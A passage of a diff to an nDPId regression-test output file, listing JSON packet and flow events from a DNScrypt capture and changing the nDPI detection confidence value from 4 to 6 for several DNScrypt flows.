02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAXcKekgAH4Rh58KAAABa6o5IteRAbsGBOOGsy4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":55185,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":55185,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":528,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396111} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":528,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAABQKekAuX4RrHIKAAABa6o5IgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":529,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":36335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396111,"pkt":"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"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":36335,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":36335,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":37287,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAIcKetAAH4Ra10KAAABa6o5IpGnAbsCCGeisy0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":37287,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":37287,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":531,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":33143,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAXcKewgAH4Rh5wKAAABa6o5IoF3AbsGBDmjsywBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":33143,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":33143,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":42141,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAXcKe0gAH4Rh5sKAAABa6o5IqSdAbsGBBZ5szABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":42141,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":42141,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":533,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396111} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":533,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAABQKewAuX4RrG8KAAABa6o5IgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":534,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396111} 
@@ -1087,24 +1087,24 @@ 00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":946739396218,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":946739396218,"pkt":"ZmZmZmZmRERERERECABFAADcvzkAADQRYU9rqjkiCgAAAQG7pJ0AyPvgszCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAcAMABAAAQAAAAAAfXxETlNDAAIAAI\/a1gzqXBRkeMMNLdByUsrCAeXq9pAoSIZvWZO078wHKN5t9zokYno4cH1X8DUwDBTmKYZNXI496f2ZPTyfGw7EiDsrhQ4a28OXE48fibQ4VcAHxN0Yn+p8BQ7Bz9i\/KcWIOyuFDhrbX1Oowl9TqMJfVPpC"} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":56988,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAIcPTRAAH4RwyoKAAABucF\/9N6cAbsCCPyL\/I8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA